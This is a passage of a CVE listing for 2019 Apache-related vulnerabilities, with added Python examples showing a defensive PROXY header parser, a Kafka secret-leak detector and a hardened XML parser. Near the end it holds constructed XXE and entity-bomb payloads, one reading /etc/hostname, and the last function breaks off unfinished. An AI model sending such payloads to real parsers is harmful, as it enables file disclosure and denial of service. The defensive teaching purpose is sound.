debian debian_linux 10.0
oracle enterprise_manager_ops_center 12.4.0
oracle enterprise_manager_ops_center 12.3.3
debian debian_linux 8.0
oracle communications_element_manager 8.2.0
oracle communications_element_manager 8.0.0
netapp clustered_data_ontap 9.6
oracle communications_element_manager 8.1.1
oracle secure_global_desktop 5.5
canonical ubuntu_linux 16.04
redhat software_collection 1.0
fedoraproject fedora 30
oracle communications_element_manager 8.1.0
CVE-2019-10093 MEDIUM

In Apache Tika 1.19 to 1.21, a carefully crafted 2003ml or 2006ml file could consume all available SAXParsers in the pool and lead to very long hangs. Apache Tika users should upgrade to 1.22 or later.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-770,

Products Affected

Vendor Product Version
apache tika *
CVE-2019-10094 MEDIUM

A carefully crafted package/compressed file that, when unzipped/uncompressed yields the same file (a quine), causes a StackOverflowError in Apache Tika's RecursiveParserWrapper in versions 1.7-1.21. Apache Tika users should upgrade to 1.22 or later.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-770,

Products Affected

Vendor Product Version
apache tika *
CVE-2019-10095 HIGH

A bash command injection vulnerability in Apache Zeppelin allows an attacker to inject system commands into Spark interpreter settings. This issue affects Apache Zeppelin version 0.9.0 and prior versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-77,

Products Affected

Vendor Product Version
apache zeppelin *
CVE-2019-10097 MEDIUM

In Apache HTTP Server 2.4.32-2.4.39, when mod_remoteip was configured to use a trusted intermediary proxy server using the "PROXY" protocol, a specially crafted PROXY header could trigger a stack buffer overflow or NULL pointer dereference. This vulnerability could only be triggered by a trusted proxy and not by untrusted HTTP clients.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.2 HIGH CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H 1.2 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-476,CWE-787,

Products Affected

Vendor Product Version
oracle instantis_enterprisetrack *
oracle communications_session_route_manager 8.1.1
oracle http_server 12.2.1.4.0
oracle communications_session_report_manager 8.1.1
oracle enterprise_manager_ops_center 12.4.0
oracle enterprise_manager_ops_center 12.3.3
apache http_server 2.4.38
oracle communications_element_manager 8.2.0
oracle communications_element_manager 8.0.0
oracle communications_session_report_manager 8.2.1
oracle communications_element_manager 8.1.1
oracle communications_session_report_manager 8.2.0
apache http_server 2.4.35
apache http_server 2.4.33
oracle retail_xstore_point_of_service 7.1
apache http_server 2.4.34
oracle communications_element_manager 8.1.0
oracle communications_session_route_manager 8.2.1
oracle communications_session_route_manager 8.2.0
apache http_server 2.4.37
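
The mod_remoteip entry is about a parser that trusts its input because the input is supposed to come from a trusted proxy. The Python example below is added here to show what a defensive PROXY protocol v1 parser looks like and where the trust boundary sits; it is not httpd code and does not reproduce the crashing header (the advisory does not describe it). The parser bounds the header to the 107 bytes the protocol allows, validates every field before use, and is only reached when the TCP peer is in a configured proxy list, which is the role `RemoteIPProxyProtocol` and `RemoteIPProxyProtocolExceptions` play in httpd. The sample headers are constructed.

```python
import ipaddress

MAX_V1_HEADER = 107  # longest legal v1 line including CRLF, per the PROXY protocol spec


class ProxyHeaderError(ValueError):
    """Malformed PROXY header; the connection should be closed, not guessed at."""


def parse_proxy_v1(data: bytes):
    """Parse a PROXY protocol v1 line from the start of `data`.

    Returns (info, remaining_bytes); info is None for 'PROXY UNKNOWN'.
    Every field is length-, type- and range-checked before it is used."""
    if not data.startswith(b"PROXY "):
        raise ProxyHeaderError("missing PROXY signature")
    end = data.find(b"\r\n", 0, MAX_V1_HEADER)  # never scan past the maximum
    if end == -1:
        raise ProxyHeaderError("no CRLF within %d bytes" % MAX_V1_HEADER)
    line, rest = data[:end], data[end + 2:]
    if not line.isascii():
        raise ProxyHeaderError("non-ASCII byte in header")
    fields = line.decode("ascii").split(" ")
    if len(fields) >= 2 and fields[1] == "UNKNOWN":
        return None, rest  # proxy could not determine the client; keep the peer address
    if len(fields) != 6:
        raise ProxyHeaderError("expected 6 space-separated fields, got %d" % len(fields))
    _, family, src, dst, sport, dport = fields
    if family not in ("TCP4", "TCP6"):
        raise ProxyHeaderError("unsupported family %r" % family)
    want_version = 4 if family == "TCP4" else 6
    try:
        src_ip, dst_ip = ipaddress.ip_address(src), ipaddress.ip_address(dst)
    except ValueError as exc:
        raise ProxyHeaderError("bad address: %s" % exc) from None
    if src_ip.version != want_version or dst_ip.version != want_version:
        raise ProxyHeaderError("address family does not match %s" % family)
    if not (sport.isdigit() and dport.isdigit()):  # ASCII-only after the decode above
        raise ProxyHeaderError("ports must be decimal digits")
    sport_n, dport_n = int(sport), int(dport)
    if not (0 <= sport_n <= 65535 and 0 <= dport_n <= 65535):
        raise ProxyHeaderError("port out of range")
    return {"src": src_ip, "dst": dst_ip, "sport": sport_n, "dport": dport_n}, rest


def read_client_address(peer_ip: str, data: bytes, trusted_proxies):
    """Honour the PROXY line only when the TCP peer is a configured proxy.

    An untrusted peer never reaches the parser at all; its bytes are passed
    through untouched and its own address is the client address."""
    peer = ipaddress.ip_address(peer_ip)
    if peer not in {ipaddress.ip_address(p) for p in trusted_proxies}:
        return peer, data
    info, rest = parse_proxy_v1(data)
    return (info["src"] if info else peer), rest


def is_malformed(data: bytes) -> bool:
    try:
        parse_proxy_v1(data)
    except ProxyHeaderError:
        return True
    return False
```

The advisory's point survives even with this parser: a trusted proxy is inside the trust boundary, so a compromised or buggy proxy can still send whatever it likes. Keeping the parser total (every input either yields a validated record or a clean error) is what turns that into a logged rejection instead of a crash.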
CVE-2019-10098 MEDIUM

In Apache HTTP Server 2.4.0 to 2.4.39, redirects configured with mod_rewrite that were intended to be self-referential might be fooled by encoded newlines and redirect instead to an unexpected URL within the request URL.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-601,

Products Affected

Vendor Product Version
apache http_server *
CVE-2019-10099 MEDIUM

Prior to Spark 2.3.3, in certain situations Spark would write user data to local disk unencrypted, even if spark.io.encryption.enabled=true. This includes cached blocks that are fetched to disk (controlled by spark.maxRemoteBlockSizeFetchToMem); in SparkR, using parallelize; in Pyspark, using broadcast and parallelize; and use of python udfs.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-312,

Products Affected

Vendor Product Version
apache spark *
CVE-2019-10172 MEDIUM

A flaw was found in the org.codehaus.jackson:jackson-mapper-asl:1.9.x libraries. XML external entity vulnerabilities similar to CVE-2016-3720 also affect the codehaus jackson-mapper-asl libraries, but in different classes.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-611,

Products Affected

Vendor Product Version
fasterxml jackson-mapper-asl *
redhat jboss_enterprise_application_platform 7.0
apache spark 3.0.1
debian debian_linux 9.0
redhat jboss_fuse 7.0.0
debian debian_linux 8.0
CVE-2019-10241 MEDIUM

In Eclipse Jetty version 9.2.26 and older, 9.3.25 and older, and 9.4.15 and older, the server is vulnerable to XSS conditions if a remote client uses a specially formatted URL against the DefaultServlet or ResourceHandler that is configured for showing a listing of directory contents.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
eclipse jetty 9.3.13
eclipse jetty 9.4.13
eclipse jetty 9.3.17
eclipse jetty 9.2.25
eclipse jetty 9.2.18
oracle rest_data_services 11.2.0.4
eclipse jetty 9.3.8
eclipse jetty 9.3.20
eclipse jetty 9.2.3
eclipse jetty 9.2.13
eclipse jetty 9.2.15
eclipse jetty 9.3.25
eclipse jetty 9.3.22
eclipse jetty 9.2.21
oracle retail_xstore_point_of_service 16.0
eclipse jetty 9.3.11
eclipse jetty 9.4.6
eclipse jetty 9.4.11
eclipse jetty 9.3.3
eclipse jetty 9.2.17
eclipse jetty 9.3.9
eclipse jetty 9.2.9
eclipse jetty 9.2.24
oracle flexcube_core_banking *
eclipse jetty 9.3.24
eclipse jetty 9.3.2
eclipse jetty 9.4.5
eclipse jetty 9.4.10
eclipse jetty 9.3.21
eclipse jetty 9.4.0
eclipse jetty 9.4.9
eclipse jetty 9.2.5
debian debian_linux 9.0
eclipse jetty 9.4.3
eclipse jetty 9.2.23
oracle rest_data_services 12.2.0.1
eclipse jetty 9.3.16
eclipse jetty 9.3.12
eclipse jetty 9.4.8
eclipse jetty 9.4.2
eclipse jetty 9.3.5
eclipse jetty 9.2.6
eclipse jetty 9.2.16
apache activemq 5.15.9
eclipse jetty 9.2.1
eclipse jetty 9.3.15
eclipse jetty 9.3.23
eclipse jetty 9.4.7
eclipse jetty 9.2.7
eclipse jetty 9.2.10
eclipse jetty 9.2.19
debian debian_linux 10.0
oracle retail_xstore_point_of_service 17.0
eclipse jetty 9.2.20
oracle rest_data_services 18c
eclipse jetty 9.2.0
eclipse jetty 9.3.18
eclipse jetty 9.2.12
eclipse jetty 9.2.11
eclipse jetty 9.3.6
oracle retail_xstore_point_of_service 7.1
eclipse jetty 9.3.0
eclipse jetty 9.3.4
eclipse jetty 9.3.14
oracle retail_xstore_point_of_service 15.0
oracle flexcube_core_banking 5.2.0
eclipse jetty 9.4.4
eclipse jetty 9.3.10
eclipse jetty 9.2.26
eclipse jetty 9.3.1
eclipse jetty 9.2.14
eclipse jetty 9.4.14
eclipse jetty 9.4.12
eclipse jetty 9.2.22
eclipse jetty 9.3.7
eclipse jetty 9.2.4
eclipse jetty 9.4.1
eclipse jetty 9.2.8
eclipse jetty 9.2.2
eclipse jetty 9.3.19
eclipse jetty 9.4.15
oracle rest_data_services 12.1.0.2
apache drill 1.16.0
CVE-2019-12397 MEDIUM

Policy import functionality in Apache Ranger 0.7.0 to 1.2.0 is vulnerable to a cross-site scripting issue. Upgrade to 2.0.0 or later version of Apache Ranger with the fix.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache ranger *
CVE-2019-12398 LOW

In Apache Airflow before 1.10.5 when running with the "classic" UI, a malicious admin user could edit the state of objects in the Airflow metadata database to execute arbitrary javascript on certain page views. The new "RBAC" UI is unaffected.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 4.8 MEDIUM CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N 1.7 2.7

CVSS 2.0

Severity: LOW

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache airflow *
CVE-2019-12399 MEDIUM

When Connect workers in Apache Kafka 2.0.0, 2.0.1, 2.1.0, 2.1.1, 2.2.0, 2.2.1, or 2.3.0 are configured with one or more config providers, and a connector is created/updated on that Connect cluster to use an externalized secret variable in a substring of a connector configuration property value, then any client can issue a request to the same Connect cluster to obtain the connector's task configuration and the response will contain the plaintext secret rather than the externalized secrets variables.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-319,

Products Affected

Vendor Product Version
oracle banking_liquidity_management *
oracle communications_cloud_native_core_policy 1.9.0
oracle banking_corporate_lending_process_management 14.3.0
oracle banking_platform 2.7.0
oracle banking_supply_chain_finance *
oracle financial_services_analytical_applications_infrastructure *
oracle banking_credit_facilities_process_management 14.3.0
oracle banking_corporate_lending_process_management 14.4.0
apache kafka 2.2.1
oracle banking_payments 14.4.0
oracle blockchain_platform *
oracle banking_trade_finance_process_management 14.4.0
apache kafka 2.2.0
oracle banking_virtual_account_management 14.1.0
apache kafka 2.3.0
apache kafka 2.0.0
oracle banking_corporate_lending_process_management 14.1.0
oracle banking_trade_finance_process_management 14.1.0
apache kafka 2.0.1
oracle banking_virtual_account_management 14.4.0
oracle banking_credit_facilities_process_management 14.4.0
apache kafka 2.1.0
oracle banking_trade_finance_process_management 14.3.0
oracle banking_credit_facilities_process_management 14.1.0
oracle flexcube_universal_banking 14.4.0
apache kafka 2.1.1
oracle banking_virtual_account_management 14.3.0
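
The Kafka Connect entry describes a secret that stays hidden as long as the worker only ever exposes the unresolved `${provider:path:key}` template, and leaks the moment an API response carries the resolved value instead. The Python example below is added here to model that distinction; it is not Kafka code. The config provider is an in-memory stand-in for a file-backed one, the connector class name and properties file path are hypothetical, and the two response functions represent the affected and the fixed behaviour respectively. The `leaked_secrets` helper is the check an operator can run against a real `/connectors/<name>/tasks` response: does any resolved secret value appear verbatim in it?

```python
import re

# ${provider:path:key}: the syntax Connect uses for values supplied by a ConfigProvider.
VARIABLE = re.compile(r"\$\{(?P<provider>[^:}]+):(?P<path>[^:}]*):(?P<key>[^}]+)\}")

# Constructed stand-in for a file-backed config provider and its properties file.
SECRET_STORE = {"/opt/kafka/secrets.properties": {"db.password": "s3cr3t-Pa55"}}
PROVIDERS = {"file": lambda path, key: SECRET_STORE[path][key]}

# The variable sits inside a longer string: the substring case from the advisory.
# The connector class name is hypothetical.
CONNECTOR_CONFIG = {
    "connector.class": "io.example.JdbcSinkConnector",
    "connection.url": (
        "jdbc:mysql://db.internal:3306/app?user=app"
        "&password=${file:/opt/kafka/secrets.properties:db.password}"
    ),
}


def resolve(config, providers=PROVIDERS):
    """Worker-side resolution: substitute every variable, even one embedded mid-string."""
    def repl(match):
        provider = providers[match.group("provider")]
        return provider(match.group("path"), match.group("key"))
    return {key: VARIABLE.sub(repl, value) for key, value in config.items()}


def task_config_response_vulnerable(config):
    """Affected behaviour: the REST layer hands back the resolved configuration."""
    return resolve(config)


def task_config_response_fixed(config):
    """Fixed behaviour: callers get the template; only the worker ever sees the secret."""
    return dict(config)


def leaked_secrets(response, template=CONNECTOR_CONFIG, providers=PROVIDERS):
    """Detection helper: which resolved secret values appear verbatim in an API response."""
    secret_values = set()
    for value in template.values():
        for match in VARIABLE.finditer(value):
            provider = providers[match.group("provider")]
            secret_values.add(provider(match.group("path"), match.group("key")))
    return sorted(s for s in secret_values if any(s in v for v in response.values()))
```

Note that `resolve` is what the worker must do to start the task, so the secret legitimately exists in memory; the bug is purely about which representation crosses the REST boundary, and the fix is to never serialize the resolved form.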
CVE-2019-12400 LOW

In version 2.0.3 Apache Santuario XML Security for Java, a caching mechanism was introduced to speed up creating new XML documents using a static pool of DocumentBuilders. However, if some untrusted code can register a malicious implementation with the thread context class loader first, then this implementation might be cached and re-used by Apache Santuario - XML Security for Java, leading to potential security flaws when validating signed documents, etc. The vulnerability affects Apache Santuario - XML Security for Java 2.0.x releases from 2.0.3 and all 2.1.x releases before 2.1.4.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N 1.8 3.6

CVSS 2.0

Severity: LOW

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache santuario_xml_security_for_java *
oracle weblogic_server 14.1.1.0.0
oracle weblogic_server 12.2.1.4.0
redhat jboss_enterprise_application_platform 7.2
CVE-2019-12401 MEDIUM

Solr versions 1.3.0 to 1.4.1, 3.1.0 to 3.6.2 and 4.0.0 to 4.10.4 are vulnerable to an XML resource consumption attack (a.k.a. Lol Bomb, a Billion Laughs attack) via its update handler. By leveraging XML DOCTYPE and ENTITY type elements, the attacker can create a pattern that will expand when the server parses the XML, causing OOMs.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-776,

Products Affected

Vendor Product Version
apache solr *
CVE-2019-12402 MEDIUM

The file name encoding algorithm used internally in Apache Commons Compress 1.15 to 1.18 can get into an infinite loop when faced with specially crafted inputs. This can lead to a denial of service attack if an attacker can choose the file names inside of an archive created by Compress.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-835,

Products Affected

Vendor Product Version
oracle communications_session_route_manager *
oracle banking_platform 2.7.0
oracle primavera_gateway 19.12.0
oracle essbase 21.2
oracle retail_xstore_point_of_service 17.0
apache commons_compress *
oracle customer_management_and_segmentation_foundation 18.0
oracle communications_session_report_manager *
oracle flexcube_investor_servicing 12.3.0
oracle primavera_gateway *
oracle flexcube_investor_servicing 12.4.0
oracle retail_xstore_point_of_service 18.0
oracle retail_xstore_point_of_service 16.0
oracle retail_xstore_point_of_service 15.0
oracle communications_ip_service_activator 7.3.0
oracle flexcube_private_banking 12.0.0
oracle communications_element_manager *
oracle banking_payments *
oracle hyperion_infrastructure_technology 11.1.2.4
oracle webcenter_portal 12.2.1.3.0
oracle peoplesoft_enterprise_pt_peopletools 8.57
oracle webcenter_portal 12.2.1.4.0
oracle peoplesoft_enterprise_pt_peopletools 8.58
oracle flexcube_investor_servicing 12.1.0
oracle flexcube_investor_servicing 14.1.0
oracle retail_integration_bus 15.0
oracle peoplesoft_enterprise_pt_peopletools 8.56
fedoraproject fedora 31
oracle banking_platform 2.8.0
fedoraproject fedora 30
oracle banking_platform 2.9.0
oracle communications_ip_service_activator 7.4.0
oracle retail_xstore_point_of_service 19.0
oracle flexcube_investor_servicing 14.0.0
oracle banking_platform 2.6.2
oracle flexcube_private_banking 12.1.0
oracle retail_integration_bus 16.0
oracle jdeveloper 12.2.1.4.0
CVE-2019-12404 MEDIUM

On Apache JSPWiki, up to version 2.11.0.M4, a carefully crafted plugin link invocation could trigger an XSS vulnerability on Apache JSPWiki, related to InfoContent.jsp, which could allow the attacker to execute javascript in the victim's browser and get some sensitive information about the victim.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache jspwiki *
apache jspwiki 2.11.0
CVE-2019-12405 MEDIUM

Improper authentication is possible in Apache Traffic Control versions 3.0.0 and 3.0.1 if LDAP is enabled for login in the Traffic Ops API component. Given a username for a user that can be authenticated via LDAP, it is possible to improperly authenticate as that user without that user's correct password.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-287,

Products Affected

Vendor Product Version
apache traffic_control 3.0.0
apache traffic_control 3.0.1
CVE-2019-12406 MEDIUM

Apache CXF before 3.3.4 and 3.2.11 does not restrict the number of message attachments present in a given message. This leaves open the possibility of a denial of service type attack, where a malicious user crafts a message containing a very large number of message attachments. From the 3.3.4 and 3.2.11 releases, a default limit of 50 message attachments is enforced. This is configurable via the message property "attachment-max-count".

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H 2.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-770,

Products Affected

Vendor Product Version
oracle commerce_guided_search 11.3.2
apache cxf *
oracle flexcube_private_banking 12.0.0
oracle flexcube_private_banking 12.1.0
oracle retail_order_broker 15.0
CVE-2019-12407 MEDIUM

On Apache JSPWiki, up to version 2.11.0.M4, a carefully crafted plugin link invocation could trigger an XSS vulnerability on Apache JSPWiki, related to the remember parameter on some of the JSPs, which could allow the attacker to execute javascript in the victim's browser and get some sensitive information about the victim.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache jspwiki *
apache jspwiki 2.11.0
CVE-2019-12408 MEDIUM

It was discovered that the C++ implementation (which underlies the R, Python and Ruby implementations) of Apache Arrow 0.14.0 to 0.14.1 had an uninitialized memory bug when building arrays with null values in some cases. This can lead to uninitialized memory being unintentionally shared if Arrow Arrays are transmitted over the wire (for instance with Flight) or persisted in the streaming IPC and file formats.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-909,

Products Affected

Vendor Product Version
apache arrow *
CVE-2019-12409 HIGH

The 8.1.1 and 8.2.0 releases of Apache Solr contain an insecure setting for the ENABLE_REMOTE_JMX_OPTS configuration option in the default solr.in.sh configuration file shipping with Solr. If you use the default solr.in.sh file from the affected releases, then JMX monitoring will be enabled and exposed on RMI_PORT (default=18983), without any authentication. If this port is opened for inbound traffic in your firewall, then anyone with network access to your Solr nodes will be able to access JMX, which may in turn allow them to upload malicious code for execution on the Solr server.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-434,

Products Affected

Vendor Product Version
apache solr 8.2.0
apache solr 8.1.1
CVE-2019-12410 MEDIUM

While investigating UBSAN errors in https://github.com/apache/arrow/pull/5365 it was discovered that Apache Arrow versions 0.12.0 to 0.14.1 left Array memory uninitialized when reading RLE null data from Parquet. This affected the C++, Python, Ruby and R implementations. The uninitialized memory could potentially be shared if Arrays are transmitted over the wire (for instance with Flight) or persisted in the streaming IPC and file formats.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-909,

Products Affected

Vendor Product Version
apache arrow *
CVE-2019-12412 MEDIUM

A flaw in the libapreq2 v2.07 to v2.13 multipart parser can dereference a null pointer, leading to a process crash. A remote attacker could send a request causing a process crash, which could lead to a denial of service.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-476,

Products Affected

Vendor Product Version
apache libapreq2 *
CVE-2019-12413 MEDIUM

In Apache Incubator Superset before 0.31, a user could query database metadata information from a database he has no access to by using a specially crafted complex query.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache superset *
CVE-2019-12414 MEDIUM

In Apache Incubator Superset before 0.32, a user can view database names that he has no access to in a dropdown list in SQL Lab.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache superset *
CVE-2019-12415 LOW

In Apache POI up to 4.1.0, when using the tool XSSFExportToXml to convert user-provided Microsoft Excel documents, a specially crafted document can allow an attacker to read files from the local filesystem or from internal network resources via XML External Entity (XXE) Processing.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 1.8 3.6

CVSS 2.0

Severity: LOW

Problem Type: CWE-611,

Products Affected

Vendor Product Version
oracle peoplesoft_enterprise_peopletools 8.59
oracle banking_enterprise_product_manufacturing 2.7.0
oracle enterprise_manager_base_platform 13.4.0.0
oracle banking_platform 2.4.1
oracle insurance_policy_administration_j2ee 11.0.2
oracle enterprise_manager_base_platform 13.3.0.0
oracle retail_predictive_application_server 16.0.3
oracle insurance_policy_administration_j2ee 11.2.0
oracle primavera_unifier *
oracle banking_payments 14.1.0
oracle primavera_gateway 17.12.6
oracle instantis_enterprisetrack 17.3
oracle peoplesoft_enterprise_peopletools 8.57
oracle insurance_rules_palette 11.1.0
oracle retail_clearance_optimization_engine 14.0
oracle banking_platform 2.6.1
oracle primavera_gateway 18.8.8.1
oracle webcenter_portal 12.2.1.3.0
oracle primavera_unifier 18.8
oracle primavera_unifier 16.1
oracle webcenter_portal 12.2.1.4.0
oracle big_data_discovery 1.6
oracle insurance_rules_palette 10.2.0
oracle banking_enterprise_originations 2.7.0
oracle banking_payments 14.0.0
oracle application_testing_suite 13.3.0.1
oracle primavera_unifier 19.12
oracle financial_services_market_risk_measurement_and_management 8.0.6
oracle application_testing_suite 12.5.0.3
oracle banking_platform 2.9.0
oracle webcenter_sites 12.2.1.3.0
oracle banking_enterprise_originations 2.8.0
oracle endeca_information_discovery_studio 3.2.0
oracle banking_platform 2.6.2
oracle enterprise_manager_base_platform 12.1.0.5
oracle banking_platform 2.7.1
oracle flexcube_private_banking 12.1.0
oracle communications_diameter_signaling_router_idih: 8.2.2
oracle webcenter_sites 12.2.1.4.0
oracle banking_platform 2.7.0
oracle financial_services_analytical_applications_infrastructure *
oracle communications_diameter_signaling_router_idih: 8.0.0
oracle instantis_enterprisetrack 17.1
oracle banking_platform 2.6.0
oracle application_testing_suite 13.2.0.1
oracle enterprise_repository 12.1.3.0.0
oracle insurance_rules_palette 11.2.0
oracle primavera_unifier 16.2
oracle peoplesoft_enterprise_peopletools 8.58
oracle banking_enterprise_product_manufacturing 2.8.0
oracle flexcube_private_banking 12.0.0
apache poi *
oracle retail_order_broker 15.0
oracle hyperion_infrastructure_technology 11.1.2.4
oracle retail_predictive_application_server 15.0.3
oracle application_testing_suite 13.1.0.1
oracle retail_order_broker 16.0
oracle insurance_rules_palette 10.2.4
oracle financial_services_market_risk_measurement_and_management 8.0.8
oracle insurance_policy_administration_j2ee 11.1.0
oracle banking_platform 2.5.0
oracle instantis_enterprisetrack 17.2
oracle banking_platform 2.4.0
oracle insurance_rules_palette 11.0.2
oracle jdeveloper 12.2.1.4.0
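
Three entries on this page (CVE-2019-10172 in jackson-mapper-asl, CVE-2019-12401 in the Solr update handler and CVE-2019-12415 in POI's XSSFExportToXml) are the same root cause seen twice: an XML parser that honours a DOCTYPE supplied by the attacker, which lets the attacker declare either internal entities that blow up on expansion or an external entity that reads a local file. The Python example below is added here to show both the attack shape and the single mitigation; it is not code from any of those projects. It uses the stdlib expat bindings, the two payloads are constructed (the entity bomb is deliberately kept to three levels of ten so it is safe to run), and the hardened parser takes the same approach defusedxml does: refuse any DOCTYPE before a single entity can be declared, and refuse external entity resolution as defence in depth.

```python
import xml.parsers.expat as expat


class DoctypeRejected(ValueError):
    """Raised by the hardened parser as soon as a DOCTYPE or external entity appears."""


# Constructed inputs for the demo, not samples taken from the advisories.
# Three nested levels of ten references turn ~210 bytes of input into 10**3 bytes
# of text; the classic attack uses ten levels, which is where the OOM comes from.
ENTITY_BOMB = (
    '<?xml version="1.0"?>\n'
    '<!DOCTYPE add [\n'
    '  <!ENTITY a "xxxxxxxxxx">\n'
    '  <!ENTITY b "&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;">\n'
    '  <!ENTITY c "&b;&b;&b;&b;&b;&b;&b;&b;&b;&b;">\n'
    ']>\n'
    '<add><doc><field name="id">&c;</field></doc></add>'
)

# The XXE shape that a consumer resolving external entities turns into a file read.
XXE_PAYLOAD = (
    '<?xml version="1.0"?>\n'
    '<!DOCTYPE data [ <!ENTITY xxe SYSTEM "file:///etc/hostname"> ]>\n'
    '<data>&xxe;</data>'
)

CLEAN_DOC = '<add><doc><field name="id">1</field></doc></add>'


def parse_text_lenient(doc: str) -> str:
    """Default expat behaviour: internal entities are expanded into character data."""
    chunks = []
    parser = expat.ParserCreate()
    parser.CharacterDataHandler = chunks.append
    parser.Parse(doc, True)
    return "".join(chunks)


def parse_text_hardened(doc: str) -> str:
    """Reject any DOCTYPE before an entity can be declared; never resolve external ones."""
    chunks = []
    parser = expat.ParserCreate()

    def reject_doctype(name, sysid, pubid, has_internal_subset):
        raise DoctypeRejected("DOCTYPE not accepted (root %r)" % name)

    def reject_external(context, base, system_id, public_id):
        # Unreachable once DOCTYPEs are rejected, kept as a second line of defence.
        raise DoctypeRejected("external entity %r refused" % system_id)

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.ExternalEntityRefHandler = reject_external
    parser.CharacterDataHandler = chunks.append
    parser.Parse(doc, True)
    return "".join(chunks)


def expansion_factor(doc: str) -> float:
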